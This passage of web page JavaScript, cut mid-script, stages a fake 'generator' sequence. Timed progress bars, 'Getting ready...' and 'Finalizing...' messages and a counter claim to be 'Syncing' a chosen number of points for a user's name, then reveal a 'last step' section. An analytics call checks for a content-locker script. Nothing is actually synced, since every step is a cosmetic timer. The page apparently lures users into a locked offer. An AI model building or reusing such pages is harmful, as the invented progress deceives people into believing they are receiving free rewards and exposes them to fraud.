      document.getElementById("content").classList.add("slit-out-vertical");
    setTimeout(function(){
      document.getElementById("content2").style.display="block";
      document.getElementById("content").style.height="0px";
      document.getElementById("content").style.padding="0px";
        document.getElementById("content").style.margin="0px";
            }, 1000);
    }, 1000);

  }, 1000);
}, 4000);
      }, 1000);

}

}

function proceed2(){
  audioclick.play();
  document.getElementById("content2").classList.remove("showin");
    document.getElementById("content2").classList.add("hidein");
      setTimeout(function(){
        document.getElementById("content2").style.display="none";
        document.getElementById("content3").style.display="block";
        setTimeout(function(){
        document.getElementById("loading-step").innerHTML="Getting ready...";
        document.getElementById("pro-bar").classList.add("pro10");
        setTimeout(function(){
        document.getElementById("loading-step").innerHTML='Syncing <span style="font-size: 24px;font-weight: 900;color:yellow">'+cardvalue+'</span> POINTS for <span style="font-size: 24px;font-weight: 900;color:yellow">' + name +'</span>' ;
        document.getElementById("coinamount").innerHTML=cardvalue;
        document.getElementById("NameLastStep").innerHTML=name;
        document.getElementById("pro-bar").classList.add("pro10to20");
document.getElementById("content4").style.display="block";
window.scrollBy(0, 200);
var coin=0;
var myVar2 = setInterval(UserTimer, 1);
        function UserTimer() {

document.getElementById("gen-coin").innerHTML=Math.floor(coin);
document.getElementById("pro-bar2").classList.add("pro0To100");
audiopoinrunning.play();
coin=coin+(cardvalue/1000);
if (coin>=cardvalue){
  document.getElementById("gen-coin").innerHTML=Math.floor(cardvalue);
  clearInterval(myVar2);
  document.getElementById("content4").classList.remove("showin");
  document.getElementById("content4").classList.add("hidein");

  window.scrollBy(0, -200);

        setTimeout(function(){
            document.getElementById("content4").style.display="none";
          document.getElementById("loading-step").innerHTML="Finalizing...";
          document.getElementById("pro-bar").classList.add("pro20to70");

          setTimeout(function(){
            document.getElementById("loading-step").innerHTML="Loading last step...";
            document.getElementById("pro-bar").classList.add("pro70to94");

            setTimeout(function(){
              document.getElementById("content3").classList.remove("showin");
              document.getElementById("content3").classList.add("hidein");

              setTimeout(function(){
document.getElementById("content3").style.display="none";
                document.getElementById("content5").style.display="block";

              },1000);

            },1000);


          },2000);
        },4000);

}
        }


      },2000);
        },1000);

      },1000);

}

</script>
<script>
    if(typeof window.ga === 'function'){
        ga('create', 'UA-85922709-2', 'auto', 'customTemplateGlobal');
        ga('customTemplateGlobal.set', 'dimension1', typeof window.CPBContentLocker === 'function' ? 0 : 1);
        ga('customTemplateGlobal.send', 'pageView');
    }


</script>
</body>
</html>
